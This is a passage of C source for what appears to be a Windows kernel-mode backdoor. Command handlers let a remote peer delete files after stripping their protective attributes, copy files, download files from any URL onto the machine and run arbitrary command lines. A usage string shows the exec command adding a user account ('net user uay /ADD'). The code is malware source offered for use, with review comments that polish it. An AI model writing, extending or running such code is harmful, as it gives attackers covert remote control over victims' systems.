uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Del;
}
DbgPrint("del file: %S\n",tempforpAth);//debug
RtlInitUnicodeString(&nAme,tempforpAth);
InitializeObjectAttributes(
&oA,
&nAme,
OBJ_CASE_INSENSITIVE,
NULL,
NULL
);
dwStAtus = ZwOpenFile(
&hFileHAndle,
GENERIC_READ|FILE_WRITE_ATTRIBUTES|DELETE,//|GENERIC_WRITE|DELETE,
&oA,
&IoStAtusBlock,
FILE_SHARE_READ|FILE_SHARE_WRITE,
FILE_NON_DIRECTORY_FILE
);
DbgPrint("ZwOpenFile dwStAtus: 0x%x\n",dwStAtus);//debug
DbgPrint("ZwOpenFile IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug
if (dwStAtus != STATUS_SUCCESS || dwStAtus == STATUS_OBJECT_NAME_NOT_FOUND){
uSend(
pRecvList->pConnection,
Argv[i],
strlen(Argv[i])
);
uSend(
pRecvList->pConnection,
" do not exists\n",
strlen(" do not exists\n")
);
continue;
}
fileBAsicInfor.FileAttributes = FILE_ATTRIBUTE_NORMAL;//&= ~(FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
dwStAtus = ZwSetInformationFile(
hFileHAndle,
&IoStAtusBlock,
&fileBAsicInfor,
sizeof(FILE_BASIC_INFORMATION),
FileBasicInformation
);
DbgPrint("dwStAtus: 0x%x\n",dwStAtus);//debug
DbgPrint("IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug
fileDispositionInfor.DeleteFile = TRUE;
dwStAtus = ZwSetInformationFile(
hFileHAndle,
&IoStAtusBlock,
&fileDispositionInfor,
sizeof(FILE_DISPOSITION_INFORMATION),
FileDispositionInformation
);
DbgPrint("dwStAtus: 0x%x\n",dwStAtus);//debug
DbgPrint("IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug
if(hFileHAndle){
ZwClose(hFileHAndle);
}
/*
dwStAtus = ZwDeleteFile(
&oA
);
DbgPrint("dwStAtus: 0x%x\n",dwStAtus);
if(dwStAtus == STATUS_OBJECT_NAME_NOT_FOUND){
uSend(
pRecvList->pConnection,
Argv[i],
strlen(Argv[i])
);
uSend(
pRecvList->pConnection,
" do not exists\n",
strlen(" do not exists\n")
);
continue;
}
else if(dwStAtus == STATUS_ACCESS_DENIED){
uSend(
pRecvList->pConnection,
Argv[i],
strlen(Argv[i])
);
uSend(
pRecvList->pConnection,
" : ACCESS DENIED\n",
strlen(" : ACCESS DENIED\n")
);
continue;
}
else if(dwStAtus == STATUS_SUCCESS){
//do noting;
continue;
}
else if(dwStAtus == STATUS_CANNOT_DELETE){
uSend(
pRecvList->pConnection,
Argv[i],
strlen(Argv[i])
);
uSend(
pRecvList->pConnection,
" : CANNOT DELETE\n",
strlen(" : CANNOT DELETE\n")
);
}
else{
uSend(
pRecvList->pConnection,
"del: error\n",
strlen("del: error\n")
);
continue;
}
*/
}//for
end_CommAnd_Del:
ExFreePool(tempforpAth);
ExFreePool(tempforArg);
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
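/*
 * BuildCopyPAth - compose the NT path "\??\<path>" for one copy operand.
 *
 * dst  output buffer of MAXPATHLENGTH_W bytes; zeroed first, so it is
 *      NUL-terminated whatever happens.
 * Arg  operand already widened with Atow.  A drive letter in Arg[1] with no
 *      leading blank ("X:...") is taken as absolute; anything else is
 *      appended to cwd.
 * cwd  the connection's current directory (pConnection->m_PAth).
 *
 * Returns TRUE when the composed path fits, FALSE when it would not.  The
 * length test runs before either wcscat, so dst is never overrun.  No ".."
 * filtering is done: the same peer can already run arbitrary commands
 * through CommAnd_Exec, so sandboxing the path here would add nothing.
 */
static BOOLEAN BuildCopyPAth(WCHAR *dst, const WCHAR *Arg, const WCHAR *cwd)
{
    /* absolute path, including the drive letter */
    BOOLEAN absolute = (Arg[1] == L':' && Arg[0] != L' ');
    size_t needed;

    RtlZeroMemory(dst, MAXPATHLENGTH_W);
    RtlCopyMemory(dst, L"\\??\\", sizeof(L"\\??\\"));

    needed = wcslen(dst) + wcslen(Arg);
    if (!absolute) {
        needed += wcslen(cwd);
    }
    /* MAXPATHLENGTH_W counts bytes, hence *2; strict '<' leaves room for the NUL */
    if (needed * 2 >= MAXPATHLENGTH_W) {
        return FALSE;
    }
    if (!absolute) {
        wcscat(dst, cwd);
    }
    wcscat(dst, Arg);
    return TRUE;
}

/*
 * CommAnd_Copy - "copy <source> <dest>" handler.
 *
 * Copies the file named by Argv[1] into a newly created file named by
 * Argv[2], one 1 KiB chunk at a time through the Zw* file APIs.  Each name
 * goes through BuildCopyPAth, so "X:..." is absolute and anything else is
 * relative to the connection's current directory.  The destination is
 * opened with FILE_CREATE, so an existing file is never overwritten.
 *
 * pRecvList  connection whose pConnection receives status text via uSend.
 * Argc/Argv  parsed command line; exactly three entries are required.
 *
 * Returns STATUS_SUCCESS when the copy completed (a STATUS_END_OF_FILE on
 * the source is the normal terminating condition), STATUS_INSUFFICIENT_RESOURCES
 * when pool allocation fails, and the failing NTSTATUS of a read or write
 * otherwise.  Argument and open errors are reported to the peer and yield
 * STATUS_SUCCESS, like the other CommAnd_* handlers.
 */
NTSTATUS CommAnd_Copy(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[])
{
    enum { COPY_CHUNK = 1024 };
    CHAR *tooLong = "hAy! file nAme is too long,do you wAnnA A overflow?\n";
    HANDLE hFile_source = NULL, hFile_dest = NULL;
    OBJECT_ATTRIBUTES oA_source, oA_dest;
    UNICODE_STRING nAme_source, nAme_dest;
    /* Initialised: the argument-error exits used to return whatever was on the stack. */
    NTSTATUS dwStAtus = STATUS_SUCCESS;
    IO_STATUS_BLOCK IoStAtusBlock;
    WCHAR *tempforpAth_source = NULL, *tempforpAth_dest = NULL;
    WCHAR *tempforArg_source = NULL, *tempforArg_dest = NULL;
    CHAR *CopyBuffer = NULL;   /* kernel stack is precious: the copy chunk lives in pool */
    ULONG CopyLength;

    /* NOTE(review): ExAllocatePoolWithTag would make any leak attributable in the debugger. */
    CopyBuffer         = ExAllocatePool(PagedPool, COPY_CHUNK);
    tempforpAth_source = ExAllocatePool(PagedPool, MAXPATHLENGTH_W);
    tempforpAth_dest   = ExAllocatePool(PagedPool, MAXPATHLENGTH_W);
    tempforArg_source  = ExAllocatePool(PagedPool, MAXARGLENGTH_W);
    tempforArg_dest    = ExAllocatePool(PagedPool, MAXARGLENGTH_W);
    if (CopyBuffer == NULL || tempforpAth_source == NULL || tempforpAth_dest == NULL ||
        tempforArg_source == NULL || tempforArg_dest == NULL) {
        /* Touching a NULL pool pointer below would bugcheck; bail out instead. */
        dwStAtus = STATUS_INSUFFICIENT_RESOURCES;
        goto end_CommAnd_Copy;
    }

    if (Argc > 3) {
        uSend(pRecvList->pConnection, "too mAny Arguments\n", strlen("too mAny Arguments\n"));
        goto end_CommAnd_Copy;
    }
    if (Argc < 3) {
        uSend(pRecvList->pConnection, "too few Arguments\n", strlen("too few Arguments\n"));
        goto end_CommAnd_Copy;
    }

    /* Widen both operands; the length check bounds what Atow writes into the
       MAXARGLENGTH_W buffers. */
    RtlZeroMemory(tempforArg_source, MAXARGLENGTH_W);
    RtlZeroMemory(tempforArg_dest, MAXARGLENGTH_W);
    if (strlen(Argv[1]) >= MAXARGLENGTH_A || strlen(Argv[2]) >= MAXARGLENGTH_A) {
        uSend(pRecvList->pConnection, tooLong, strlen(tooLong));
        goto end_CommAnd_Copy;
    }
    Atow(Argv[1], tempforArg_source);
    Atow(Argv[2], tempforArg_dest);

    if (!BuildCopyPAth(tempforpAth_source, tempforArg_source, pRecvList->pConnection->m_PAth) ||
        !BuildCopyPAth(tempforpAth_dest, tempforArg_dest, pRecvList->pConnection->m_PAth)) {
        uSend(pRecvList->pConnection, tooLong, strlen(tooLong));
        goto end_CommAnd_Copy;
    }
    DbgPrint("copy source: %S\n", tempforpAth_source);//debug
    DbgPrint("copy dest: %S\n", tempforpAth_dest);//debug

    RtlInitUnicodeString(&nAme_source, tempforpAth_source);
    RtlInitUnicodeString(&nAme_dest, tempforpAth_dest);
    /* OBJ_KERNEL_HANDLE: a handle placed in the current process's table could be
       closed or reused by that user-mode process while we are still using it. */
    InitializeObjectAttributes(&oA_source, &nAme_source,
                               OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);
    InitializeObjectAttributes(&oA_dest, &nAme_dest,
                               OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);

    dwStAtus = ZwOpenFile(&hFile_source, GENERIC_READ | SYNCHRONIZE, &oA_source,
                          &IoStAtusBlock, FILE_SHARE_READ,
                          FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE);
    DbgPrint("ZwOpenFile dwStAtus: 0x%x\n", dwStAtus);//debug
    if (dwStAtus != STATUS_SUCCESS) {
        /* Any open failure (including access denied) is reported as "does not exist";
           finer-grained messages would be an improvement. */
        hFile_source = NULL;
        uSend(pRecvList->pConnection, Argv[1], strlen(Argv[1]));
        uSend(pRecvList->pConnection, " do not exists\n", strlen(" do not exists\n"));
        dwStAtus = STATUS_SUCCESS;
        goto end_CommAnd_Copy;
    }

    dwStAtus = ZwCreateFile(&hFile_dest, GENERIC_WRITE | SYNCHRONIZE, &oA_dest,
                            &IoStAtusBlock, 0, FILE_ATTRIBUTE_NORMAL, 0, FILE_CREATE,
                            FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
    DbgPrint("ZwCreAteFile dwStAtus: 0x%x\n", dwStAtus);//debug
    if (dwStAtus != STATUS_SUCCESS) {
        /* The source handle is now released at end_CommAnd_Copy; this path used to leak it. */
        hFile_dest = NULL;
        uSend(pRecvList->pConnection, "file AlreAdy exists or bAd pAth\n",
              strlen("file AlreAdy exists or bAd pAth\n"));
        dwStAtus = STATUS_SUCCESS;
        goto end_CommAnd_Copy;
    }

    for (;;) {
        dwStAtus = ZwReadFile(hFile_source, NULL, NULL, NULL, &IoStAtusBlock,
                              CopyBuffer, COPY_CHUNK, NULL, NULL);
        if (dwStAtus == STATUS_END_OF_FILE) {
            /* synchronous read past the end: the whole file has been copied */
            dwStAtus = STATUS_SUCCESS;
            break;
        }
        if (!NT_SUCCESS(dwStAtus)) {
            break;
        }
        CopyLength = (ULONG)IoStAtusBlock.Information;
        if (CopyLength == 0) {
            break;   /* defensive: a zero-byte success must not loop forever */
        }
        dwStAtus = ZwWriteFile(hFile_dest, NULL, NULL, NULL, &IoStAtusBlock,
                               CopyBuffer, CopyLength, NULL, NULL);
        if (!NT_SUCCESS(dwStAtus)) {
            break;   /* previously ignored, which silently produced a truncated copy */
        }
    }

end_CommAnd_Copy:
    if (hFile_dest != NULL) {
        ZwClose(hFile_dest);
    }
    if (hFile_source != NULL) {
        ZwClose(hFile_source);
    }
    /* ExFreePool(NULL) is not a no-op in the kernel, so every free is guarded. */
    if (CopyBuffer != NULL) {
        ExFreePool(CopyBuffer);
    }
    if (tempforpAth_source != NULL) {
        ExFreePool(tempforpAth_source);
    }
    if (tempforpAth_dest != NULL) {
        ExFreePool(tempforpAth_dest);
    }
    if (tempforArg_source != NULL) {
        ExFreePool(tempforArg_source);
    }
    if (tempforArg_dest != NULL) {
        ExFreePool(tempforArg_dest);
    }
    return dwStAtus;
}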
//--------------------------------------------------------------------
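/*
 * CommAnd_Wget - "wget <URL> <fullFileNAme>" handler.
 *
 * Validates the argument count and combined length, then hands the URL and
 * destination path to KWget (implemented elsewhere); a FALSE result from it
 * is reported to the peer as an unsupported OS version.
 *
 * pRecvList  connection that receives usage / error text via uSend.
 * Argc/Argv  exactly three entries: command, URL, destination path.
 *
 * Always returns STATUS_SUCCESS; problems are reported to the peer instead.
 */
NTSTATUS CommAnd_Wget(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[])
{
    /* Combined-length limit inherited from the original check; presumably it
       matches a fixed buffer inside KWget - confirm there. */
    enum { WGET_ARG_LIMIT = 98 };
    CHAR *usAge = "wrong Arguments\n wget URL fullFileNAme\n";
    CHAR *tooLong = "Arguments Are too long";
    CHAR *unsupported = "os version not support\n";

    if (Argc != 3) {
        uSend(pRecvList->pConnection, usAge, strlen(usAge));
        return STATUS_SUCCESS;
    }
    if (strlen(Argv[1]) + strlen(Argv[2]) >= WGET_ARG_LIMIT) {
        /* Fix: this branch used to warn and then still call KWget with the
           oversized arguments, which defeated the check entirely. */
        uSend(pRecvList->pConnection, tooLong, strlen(tooLong));
        return STATUS_SUCCESS;
    }
    if (KWget(Argv[1], Argv[2]) == FALSE) {
        uSend(pRecvList->pConnection, unsupported, strlen(unsupported));
    }
    return STATUS_SUCCESS;
}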
//--------------------------------------------------------------------
/*
 * CommAnd_Exec - "exec <command line>" handler.
 *
 * Passes Argv[1] unchanged to KExec (implemented elsewhere); a FALSE result
 * is reported to the peer as an unsupported OS version.  Any other argument
 * count produces the usage text.
 *
 * pRecvList  connection that receives usage / error text via uSend.
 * Argc/Argv  exactly two entries: command and the quoted command line.
 *
 * Always returns STATUS_SUCCESS.
 */
NTSTATUS CommAnd_Exec(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[])
{
    CHAR *usAge = "wrong Arguments\n eg: exec \"c:\\WINDOWS\\System32\\freecell.exe\" or\n exec \"net user uay /ADD\"\n";
    CHAR *unsupported = "os version not support\n";

    if (Argc == 2) {
        if (KExec(Argv[1]) == FALSE) {
            uSend(pRecvList->pConnection, unsupported, strlen(unsupported));
        }
    } else {
        uSend(pRecvList->pConnection, usAge, strlen(usAge));
    }
    return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
//A partition (drive) is considered to exist when its root directory can be opened.
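/*
 * CommAnd_ChAngeDriver - "chAngedriver <letter>" handler ("driver" means drive).
 *
 * Switches the connection's current directory (pConnection->m_PAth) to the
 * root of drive <letter>.  The drive is deemed to exist when "\??\X:\" can
 * be opened as a directory; the directory handle is closed right away.
 *
 * pRecvList  connection whose pConnection is updated and receives status text.
 * Argc/Argv  exactly two entries, Argv[1] a single letter a-z or A-Z.
 *
 * Always returns STATUS_SUCCESS; every failure is reported to the peer.
 */
NTSTATUS CommAnd_ChAngeDriver(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[])
{
    CHAR tempA[16] = {0};   /* "\??\X:\" is 7 characters plus NUL, well inside 16 */
    WCHAR tempW[16] = {0};
    HANDLE hFile = NULL;
    NTSTATUS stAtus;
    IO_STATUS_BLOCK IoStAtusBlock;
    UNICODE_STRING nAme;
    OBJECT_ATTRIBUTES oA;
    CHAR *usAge = "wrong Arguments\n eg: chAngedriver d\n";
    CHAR letter;

    if (Argc != 2 || strlen(Argv[1]) > 1) {
        uSend(pRecvList->pConnection, usAge, strlen(usAge));
        return STATUS_SUCCESS;
    }
    letter = Argv[1][0];
    /* Inclusive bounds: the old strict comparisons wrongly rejected a, z, A and Z. */
    if (!((letter >= 'a' && letter <= 'z') || (letter >= 'A' && letter <= 'Z'))) {
        uSend(pRecvList->pConnection, "wrong driver,must be A-Z\n",
              strlen("wrong driver,must be A-Z\n"));
        return STATUS_SUCCESS;
    }

    /* Build "\??\X:\" - bounded by construction, see tempA above. */
    strcpy(tempA, "\\??\\");
    strcat(tempA, Argv[1]);
    strcat(tempA, ":\\");
    DbgPrint("%s\n", tempA);
    Atow(tempA, tempW);
    DbgPrint("%S\n", tempW);

    RtlInitUnicodeString(&nAme, tempW);
    /* OBJ_KERNEL_HANDLE: a handle placed in the current process's table could be
       closed or reused by that user-mode process while we hold it. */
    InitializeObjectAttributes(&oA, &nAme, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);
    stAtus = ZwOpenFile(&hFile, GENERIC_READ, &oA, &IoStAtusBlock,
                        FILE_SHARE_READ, FILE_DIRECTORY_FILE);
    DbgPrint("stAtus: 0x%x\n", stAtus);
    if (stAtus != STATUS_SUCCESS) {
        uSend(pRecvList->pConnection, "driver does not exists\n",
              strlen("driver does not exists\n"));
        return STATUS_SUCCESS;
    }
    ZwClose(hFile);

    /* NOTE(review): 512 is presumably sizeof(m_PAth) - confirm against the connection struct. */
    RtlZeroMemory(pRecvList->pConnection->m_PAth, 512);
    wcscpy(pRecvList->pConnection->m_PAth, &tempW[4]);   /* strip the leading "\??\" */
    return STATUS_SUCCESS;
}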
//--------------------------------------------------------------------